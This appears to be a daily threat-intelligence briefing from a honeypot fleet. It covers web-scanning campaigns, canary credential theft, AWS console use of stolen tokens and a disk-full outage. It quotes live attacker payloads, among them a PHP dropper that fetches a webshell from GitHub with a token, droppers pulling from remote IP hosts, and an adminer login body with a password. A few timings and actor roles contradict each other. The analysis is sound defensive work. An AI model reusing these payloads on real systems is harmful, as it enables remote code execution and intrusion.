FLUX FLEET — INTEL BRIEFING №24

Period: 2026-09-17 08:09 – 2026-09-18 08:09 UTC (24h, day 23 of operations)
Sources: 7 honeypot nodes (frantech-ts also runs non-flux ssh/telnet honeypots whose condensed feed lands in /data/hp-logs and is NOT part of this report) — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East), ru-edge-1 (Russia), netcup-ts + sponge-01-ts + frantech-ts (deception-only, no canaries)
Confidence: High (direct observation, 23-day baseline, every result-tag spike attributed by spot query)

BLUF

NIGHTAGENT executed its full kill chain against real infrastructure for the first time. 196.89.218.205 (Office National des Postes e-Tunisia AS — a NEW ASN for this fleet, not the Moroccan ONP family) ran the complete kit on ai-devbox-1 and canary-farm-1: phpunit webshell verification, the dropper with the unrotated GHSAT token, form login, and 4 mints. Minutes later a separate actor session began consuming the stolen AWS session token: 178.16.54.184 (Omegatech LTD, NL) ran ConsoleLogin, GetSigninToken, GetCallerIdentity, and 108 GetAccount plus 97 DescribeInstances denials across 8 use IPs — the fleet's first observed AWS console login and second credential-use event after №20's CREDENTIAL-DRAIN. Frantech-ts dropped 99% (76 events vs a 6,186 7-day average) because the node's root disk filled (100%, pcap archive at 49G): the flux writer died mid-record at 07:11 UTC Sep 17, healthchecks fail with no space left on device (FailingStreak 2,599), and the truncated JSONL tail crashed the digest until a repair. The AKAMAI-CONFIG cluster from №23 returned the next morning (200 events from 12 IPs, same /24) and added a fresh adminer POST (joomla_app + i88XB5hpLsQAzvz2f1AcHg).

Key Judgements

  1. NIGHTAGENT and CREDENTIAL-DRAIN operated as one pipeline in this window. 196.89.218.205 ran the NightAgent kit — <?php echo "NightAgent";?> verification and the nightshell dropper with the same GHSAT token that has now survived 10 windows — then minted 4 credentials (2 aidev, 2 farm). 178.16.54.184 then logged into the AWS console within 13 minutes of the first mint: 6 credentials reached AWS, 24 calls (ConsoleLogin, GetSigninToken, GetCallerIdentity), 211 denials (GetAccount ×108, DescribeInstances ×97, ListUsers ×6). The mint IPs and the AWS use IP are different hosts in different ASNs — the same separation CREDENTIAL-DRAIN showed in №20. (High confidence — the use side is Tracebit alert evidence with per-operation detail; the kit body bytes match the registered NightAgent template.)
  2. The frantech-ts outage is a disk-full failure, not a lull or an attack. The node's root filesystem is 100% full; /var/log/pcap holds 49G of tshark pcaps. The flux container's healthcheck has failed 2,599 consecutive times with no space left on device. Flux logs stop at 09:19 UTC Sep 17 — a ~23-hour hole in the fleet's deception-only legacy node. The digest's −99% cell and the missing Sep 18 behavior feed are artifacts of this outage. (High confidence — observed on the node via SSH; container state and pcap directory listing both confirm.)
  3. AKAMAI-CONFIG returned on schedule as a cluster, on a second node, with a rotated password. The 23.94.155.x /24 re-appeared on sponge-01-ts 06:20–06:26 UTC Sep 18 (200 events, 12 IPs). Leg separation repeats №23's shape: .31 (tarpit probes), .12 (phpMyAdmin 10-path enum — drove the sensor's 3.7× phpmyadmin-login spike), .14 (phpinfo/webshell sweep + 3 adminer POSTs with joomla_app + fresh 22-char password i88XB5hpLsQAzvz2f1AcHg), .24/.32 (wp-batch probes), .37 (config census). Same tooling, one day later, 0 mints. (High confidence — the adminer POST body shape and the /24 identity match the registered campaign; the password rotation follows the per-run pattern.)
  4. Two fleet-wide tarpit sweeps carried the window's volume; both are census-class, not hostile. The fleet's tarpit-module traffic concentrated on two actors: 176.65.144.71 (Dedik Services, CH) ran 1,500 events in 9 seconds on farm with forged Googlebot/2.1 and 98 trap families (an OMEGA-SWEEP-template run, 10 mints) and 2a01:e0a:3be:cec0:f54c:335a:8d29:be (Free SAS FR, residential IPv6) burned 1,967 events in 7 minutes with 632 distinct paths (86 env-family hits, 8 mints). Both inflate the farm +32% cell; both mint, and the IPv6 actor is a first-ever residential-IPv6 source. (High confidence — per-IP spot queries; the Googlebot UA matches the standing OMEGA-SWEEP forgery, the IPv6 journey is the first from a French consumer ISP.)

Active Campaigns (day 23 status)

NIGHTAGENT / CREDENTIAL-DRAIN ⚠ AWS SESSION COMPROMISED (196.89.218.205 + 178.16.54.184)

  • Actors: 196.89.218.205 — Office National des Postes e-Tunisia (new ASN for the fleet; same-name Moroccan ONP hosts NIGHTAGENT's prior operators, but this is a Tunisian AS). 178.16.54.184 — Omegatech LTD, NL (also appears in the kill-chain list as a separate kit operator; the AWS use side and the flux-side operator share the IP only as an actor name).
  • TTPs: Full NightAgent chain on both EU nodes inside 45 minutes: phpunit eval-stdin.php probes → <?php echo "NightAgent";?> verify → dropper POST <?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?> → wp-batch probes → fake-git walk → 4 /.env mints → config-bundle and tomcat-bypass walks. Mint→use gap under 15 minutes: 6 credentials drew 24 successful calls (ConsoleLogin, GetSigninToken, GetCallerIdentity) and 211 denied operations (GetAccount ×108, DescribeInstances ×97, ListUsers ×6) from 8 use IPs.
  • Assessment: The №20 CREDENTIAL-DRAIN pattern (separate mint and use infra) now runs with an authenticated console session — a step beyond №14 and №20's API-only use. The stolen session token leaks identity at most (GetCallerIdentity-class successes), and the deny-all policy held, but this is the first ConsoleLogin/GetSigninToken success the fleet has captured. The GHSAT token is on its 11th window without rotation.

AKAMAI-CONFIG ⟳ SECOND CLUSTER RUN (23.94.155.0/24, sponge-01-ts)

  • Actors: 12 IPs from the same /24 as №23 (23.94.155.11–.38, ColocCrossing/Latitude.sh US). All 12 returned within one 6-minute window (06:20–06:26 UTC Sep 18).
  • TTPs: Per-leg IP separation held: .12 ran the 10-path phpMyAdmin enum (the sensor's entire 22-event phpmyadmin-login spike), .14 ran a 22-path phpinfo/webshell sweep plus 3 adminer credential POSTs (auth[username]=joomla_app&auth[password]=i88XB5hpLsQAzvz2f1AcHg, URL-encoded form body on /adminer.php, /adminer/adminer.php, /admin/adminer.php), .37 swept 45 webshell/config paths, .24 and .32 sent wp-batch probes, .28 hit a webapp form login, .29 probed WHM. 0 mints.
  • Assessment: The cluster is a standing operator, not a one-off. It hit №23's sponge run once, and now repeats on the same node at the same hour-of-day with rotated passwords. Its credential POSTs aim at adminer, not at our traps — the fleet sees the reconnaissance only because the node surface overlaps.

OMEGA-SWEEP ⟳ TEMPLATE ESCALATION (176.65.144.71, farm + 94.154.46.244/.242/.246, Omegatech)

  • Actors: 176.65.144.71 (Dedik Services Limited, CH) — a first-ever IP running the full OMEGA-SWEEP 743-path template with forged Googlebot/2.1: 1,500 events in 9 s, 98 trap families, 10 mints in one 9-second burst. The Omegatech /46 block returned on its standing cadence: .244 ran the 743-path core on aidev (1,285 events, 9 mints), .242 ran a 450-path subset (900 events, 2 mints), .246 ran a 150-path pass on sponge (150 events in 0.1 s, 0 mints).
  • TTPs: Identical 743-path census with /.env fanout and config-file families, Googlebot/2.1 forgery, sub-10-second full-template bursts. The template continues to escape its origin block — №15 marked the first escape, №24 adds a sixth operator IP outside the /46.
  • Assessment: The census tooling is now commodity with at least 7 operator IPs. Mints-per-run stays 1:1 with template runs; the /46's all-time hoard continues to grow without observed use until this window's session compromise.

LIBREDTAIL-KIT ⟳ TENTH WINDOW (12 IPs, phpunit RCE chain)

  • Actors: 12 distinct IPs this window (390 phpunit-eval-stdin events). All fresh IPs; the honest libredtail-http UA background continues.
  • TTPs: Unchanged chain. 12 of 12 runs captured the dropper: 11 to https://217.60.103.56/sh, 1 to https://217.60.195.113/sh with arg apache.selfrep — the staging-host split from №17 reappears in miniature. 0 mints.
  • Assessment: The campaign's most consistent RCE prober. Body capture remains reliable; no staging-host change of significance.

MALWARE-DICT ⟳ Pfcloud loop (204.76.203.18, control + ru-edge)

  • Actors: 204.76.203.18 (Pfcloud UG, NL), empty UA. 3,166 events in the window across control and ru-edge, 578 paths — the loop's wordlist is at 573 registered paths with the same /bins/* arch fanout.
  • TTPs: Continuous GET dictionary. 6 observability-profiler-index probes (its only non-404 trap interaction). 0 mints.
  • Assessment: The 23-day continuous loop is now the fleet's longest-running hostile campaign. Volume matches the 7-day baseline; no wordlist growth detected this window.

REGISTRY-HUNT ⟳ (LeakIX) — 8 IPs, 8 mints

  • Actors: 8 l9scan IPs (DigitalOcean), 328 events, 41 events per IP, UA variants unchanged (2.0.234313… farm, 2.0.632323… aidev).
  • TTPs: The 12-step WebLogic→Confluence→WHM→Docker-registry walk, 1 /.env mint per IP (8 total). All 8 IPs are in the kill-chain table.
  • Assessment: Volume contracted from №23's 22-IP wave back to the №16 scale. The 1-mint-per-IP pattern is unchanged.

CREDSWEEP ⟳ RETURN (102.220.161.102, VPS Dedicated SI — 4 nodes, 4 mints)

  • Actors: 102.220.161.102 — the №23 returnee — this window ran on ru-edge, control, farm, and aidev (1 mint each, Go-http-client/1.1 UA, 00:13–02:58 UTC). Sibling .87 and .139 are standing in the same /24.
  • TTPs: Short .env census passes rather than the full 511-path run. 4 mints, 4 nodes in under 3 hours — the campaign's widest node spread to date.
  • Assessment: The VPS Dedicated /24's operator pool keeps rotating. The pacing shift (long census → quick passes on 4 nodes) suggests a scan-the-fleet phase.

INFOCREST-KIT ⟳ residual (41.249.4.249, ONP MA)

  • Actors: 41.249.4.249 returned for 6 events only (no kit run this window).
  • Assessment: The №23 operator checked in but did not re-run the kit. Sixth operator remains standing.

Standing actors (persistence check)

  • 80.94.95.211 (SS-Net RO) — 12th window in 13: aidev 3 mints + ru-edge 3 mints (6 events each pass), MSIE-9 and Opera/Nokia UA forgeries. 14 all-time window mints, zero use.
  • 213.209.159.175 (Feo Prest DE) — farm 3 + control 3 mints (77 events, 39 paths); sibling .154 ran netcup (247 events, 245 paths, Firefox/36.0 forgery, 1 mint on control) — the /24 is active on 3 nodes this window. 16 all-time window mints for .175.
  • 94.154.46.x (Omegatech, OMEGA-SWEEP /46) — .244, .242, .246 all ran (see campaign section). Hoard continues to accumulate; the block's first AWS use is this window's session compromise.
  • 176.65.148.71 — 2 events + 1 mint on farm (5:58 UTC). Fifth window in six for this single-purpose collector; 4 all-time mints.
  • 69.5.20.14 (Byteplus, ALIYUN-PROBE) — 0 events. First idle window since its №22 naming; the on-schedule pattern is now broken once.
  • 45.148.10.95 / 195.178.110.159 (Techoff git-walkers) — .159 ran 384 events/372 paths on aidev (2 mint rejections), unchanged from №23. The same-org pool rotation continues.
  • WP-ENUM gen-2 (45.156.128.x) — 0 events this window. Second-generation cluster idle after three active windows.
  • Absent: METADATA-HUNT (third idle), ENV-CENSUS-3/4, NIGHTAGENT-as-Moroccan-ONP (sixth idle — the Tunisian run is a new operator, not a return), XMLRPC-BRUTE (silent), CRUSADER-SWEEP (eighth idle), CURL-SWEEP (seventh miss), the frantech mega-dictionary hosts (23.234.119.20 and 138.199.6.195 both absent — no third replay).

Fleet Observations

  • frantech-ts outage: root filesystem 100% full since ~07:11 UTC Sep 17. /var/log/pcap (tshark/Arkime pipeline) holds 49G on a 79G disk. Flux stopped writing mid-record; the digest crashed on the truncated JSONL line until repair. Node-side remediation (pcap pruning, container restart) is ops work outside this workflow's scope — the node is live but logging nothing.
  • Digest repair: the truncated final record (a Censys GET / from 199.45.155.25, chainId 923f5d93) was dropped from medina's copy; the backup is .env-canary.jsonl.bak-truncfix-20260918. Loss is one redirect-chain hop event. The node-side source file is still truncated and will re-corrupt the next digest until the node recovers disk headroom.
  • Mint economics: 67 credentials minted to 23 collectors, 0 mint failures (the first zero-failure window since №16's). Fleet all-time issued rows: 984. Six credentials reached AWS from 178.16.54.184's theft; the deny-all policy held (24 successful calls, all identity-level).
  • XFF forgery: the single-entry counter fired on 5 rows: 2 known deploy-verification probes (70.8.208.88, /verify-forged//verify-chain), 2 from 179.43.134.114 (Private Layer CH — continued Cloudflare-XFF laundering on /tr and /stories, 4 all-time), and 1 from the benign self-labeled metabase-cve-2026-72898-detect/1.0 (31.56.58.59, header-agrees-with-peer semantics, not a forgery).
  • Control velocity: 3,082 events / 124 unique IPs. Events sit 14% under the 7-day average while unique IPs keep climbing (42 → 124 over 5 days).
  • Sponge +57%: driven by 213.177.179.52 (Feo Prest SRL, TW ASN — 1,128 events, WordPress enum + xmlrpc wp.getUsers/getAuthors POSTs on 4 nodes in 3 hours) and 192.253.248.94 (Limited Network NL, same kit on farm+control, ipsum:2+firehol2 listed). The two IPs ran the identical 282-event pass minutes apart — a synchronized two-operator WordPress user-enumeration run.

Canary credentials

Summary

12 Tracebit alert(s) fired in the window (235 use events across 6 credentials). Fleet sensors minted 67 credentials to 23 collector IPs; 6 credential(s) reached AWS. Use outcomes: 211 failure, 24 success. Denied operations: GetAccount×108, DescribeInstances×97, ListUsers×6. 24 call(s) succeeded: ConsoleLogin, GetCallerIdentity, GetSigninToken. Successes leak identity at most; treat any success beyond sts:GetCallerIdentity as a finding.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 67
Distinct collector IPs 23
Credentials used in AWS (alerts) 6
Credentials stolen, no observed AWS use in window 61

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
176.65.144.71 canary-farm-1 10 0 0 10 mints since 2026-09-18 06:02
94.154.46.244 ai-devbox-1 9 0 0 9 mints since 2026-09-17 09:24
2a01:e0a:3be:cec0:f54c:335a:8d29:be canary-farm-1 8 0 0 8 mints since 2026-09-17 17:04
213.209.159.175 canary-farm-1 3 0 0 16 mints since 2026-09-11 23:01
213.209.159.175 control-1 3 0 0 16 mints since 2026-09-11 23:01
80.94.95.211 ai-devbox-1 3 0 0 14 mints since 2026-09-11 06:54
80.94.95.211 ru-edge-1 3 0 0 14 mints since 2026-09-11 06:54
178.16.54.184 ai-devbox-1 2 6 8 ConsoleLogin, DescribeInstances, GetAccount, GetCallerIdentity, GetSigninToken, ListUsers 4 mints since 2026-09-17 14:21
178.16.54.184 canary-farm-1 2 6 8 ConsoleLogin, DescribeInstances, GetAccount, GetCallerIdentity, GetSigninToken, ListUsers 4 mints since 2026-09-17 14:21
196.89.218.205 ai-devbox-1 2 0 0 4 mints since 2026-09-18 00:57
196.89.218.205 canary-farm-1 2 0 0 4 mints since 2026-09-18 00:57
94.154.46.242 ai-devbox-1 2 0 0 12 mints since 2026-09-15 15:58
102.220.161.102 ai-devbox-1 1 0 0 4 mints since 2026-09-18 00:13
102.220.161.102 canary-farm-1 1 0 0 4 mints since 2026-09-18 00:13
102.220.161.102 control-1 1 0 0 4 mints since 2026-09-18 00:13
102.220.161.102 ru-edge-1 1 0 0 4 mints since 2026-09-18 00:13
139.59.132.8 canary-farm-1 1 0 0 1 mints since 2026-09-17 20:26
142.93.129.190 canary-farm-1 1 0 0 1 mints since 2026-09-17 20:41
142.93.143.8 ai-devbox-1 1 0 0 2 mints since 2026-09-15 20:29
143.110.213.72 canary-farm-1 1 0 0 2 mints since 2026-09-16 21:08
147.182.149.75 ai-devbox-1 1 0 0 1 mints since 2026-09-17 20:26
147.90.227.202 ai-devbox-1 1 0 0 1 mints since 2026-09-17 12:48
159.89.127.165 ai-devbox-1 1 0 0 1 mints since 2026-09-17 20:33
164.90.228.79 ai-devbox-1 1 0 0 1 mints since 2026-09-17 20:33
167.99.181.249 canary-farm-1 1 0 0 3 mints since 2026-09-15 18:13
176.65.148.71 canary-farm-1 1 0 0 4 mints since 2026-09-11 11:39
209.99.185.69 ru-edge-1 1 0 0 1 mints since 2026-09-18 03:26
213.209.159.154 control-1 1 0 0 1 mints since 2026-09-17 20:33
47.129.9.164 canary-farm-1 1 0 0 1 mints since 2026-09-17 10:37
57.154.242.54 canary-farm-1 1 0 0 2 mints since 2026-09-16 14:23

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • None: 46 mints, 2026-09-12 08:14 → 2026-09-15 10:51
  • 136.117.52.210: 26 mints, 2026-09-14 00:41 → 2026-09-14 00:41
  • 34.32.131.244: 25 mints, 2026-09-11 21:44 → 2026-09-11 21:44
  • 213.209.159.175: 16 mints, 2026-09-11 23:01 → 2026-09-18 02:31
  • 80.94.95.211: 14 mints, 2026-09-11 06:54 → 2026-09-18 02:22
  • 94.154.46.242: 12 mints, 2026-09-15 15:58 → 2026-09-17 08:56
  • 94.154.46.249: 12 mints, 2026-09-11 13:47 → 2026-09-11 13:48
  • 176.65.144.71: 10 mints, 2026-09-18 06:02 → 2026-09-18 06:02
  • 94.154.46.243: 10 mints, 2026-09-15 20:50 → 2026-09-15 20:50
  • 94.154.46.246: 10 mints, 2026-09-12 04:12 → 2026-09-12 04:13
  • 94.154.46.244: 9 mints, 2026-09-17 09:24 → 2026-09-17 09:24
  • 129.222.206.62: 8 mints, 2026-09-15 18:35 → 2026-09-15 21:40
  • 2a01:e0a:3be:cec0:f54c:335a:8d29:be: 8 mints, 2026-09-17 17:04 → 2026-09-17 17:04
  • 8.234.173.27: 7 mints, 2026-09-16 00:03 → 2026-09-16 00:03
  • 94.154.46.247: 6 mints, 2026-09-16 04:01 → 2026-09-16 04:02
  • 94.154.46.250: 5 mints, 2026-09-16 12:34 → 2026-09-16 12:34
  • 102.220.161.102: 4 mints, 2026-09-18 00:13 → 2026-09-18 02:58
  • 136.70.175.146: 4 mints, 2026-09-12 06:33 → 2026-09-12 06:33
  • 160.177.217.115: 4 mints, 2026-09-11 21:02 → 2026-09-11 21:43
  • 167.99.79.44: 4 mints, 2026-09-11 18:18 → 2026-09-11 18:19
  • 176.65.148.71: 4 mints, 2026-09-11 11:39 → 2026-09-18 05:58
  • 196.89.218.205: 4 mints, 2026-09-18 00:57 → 2026-09-18 01:39
  • 69.5.20.14: 4 mints, 2026-09-16 09:23 → 2026-09-16 15:50
  • 159.89.12.166: 3 mints, 2026-09-11 20:20 → 2026-09-16 21:07
  • 167.99.181.249: 3 mints, 2026-09-15 18:13 → 2026-09-17 20:23
  • 41.249.4.249: 3 mints, 2026-09-17 03:54 → 2026-09-17 03:55
  • 64.226.65.160: 3 mints, 2026-09-15 20:17 → 2026-09-16 21:06

Gaps / Next Collection

  1. 178.16.54.184 AWS session: 6 credentials, 8 use IPs, 235 events — but the use IPs' full journeys are outside flux (expected; they never touched the traps). Pull the Tracebit alert logs for per-operation timestamps and check whether any use IP appears in flux logs all-time (the №20 precedent says no). If a second mint→use pair appears next window, promote the mint→use pattern from CREDENTIAL-DRAIN to standing campaign.
  2. frantech-ts disk: the node will keep failing until ops trims /var/log/pcap. Until then the ssh/telnet hp feed and the flux feed are both blind — treat all frantech numbers as floor values. After recovery, check the pcap rotation policy (49G on a 79G disk is a design problem, not a one-off).
  3. 23.94.155.x: two runs on sponge in two windows, zero mints, one adminer password per run. A third run with a mint would establish the cluster's credential-harvest intent against our canary surface; watch farm+aidev for the cluster's .env fanout.
  4. 196.89.218.205 (Tunisian ONP): one full kit run + 4 mints. If the Moroccan-ONP NIGHTAGENT family returns this window was coincidence; if the Tunisian IP re-runs, register it as a NIGHTAGENT operator expansion (different country, same kit, same unrotated GHSAT token).
  5. 179.43.134.114 laundering: 4 events over 2 days on sponge, 4 different forged Cloudflare XFFs, 3 distinct paths. The socket-peer pivot holds; watch for the peer appearing on other nodes.

Digest: /data/flux-logs/reports/flux-digest-2026-09-18.md
Briefing: /data/flux-logs/reports/flux-fleet-intel-briefing-2026-09-18.md

Watch next cycle: (1) 178.16.54.184's use IPs in Tracebit alerts — a second use event shows the drain pipeline is standing. (2) frantech-ts recovery after ops trims the pcap archive. (3) AKAMAI-CONFIG cluster third run — mints would promote it.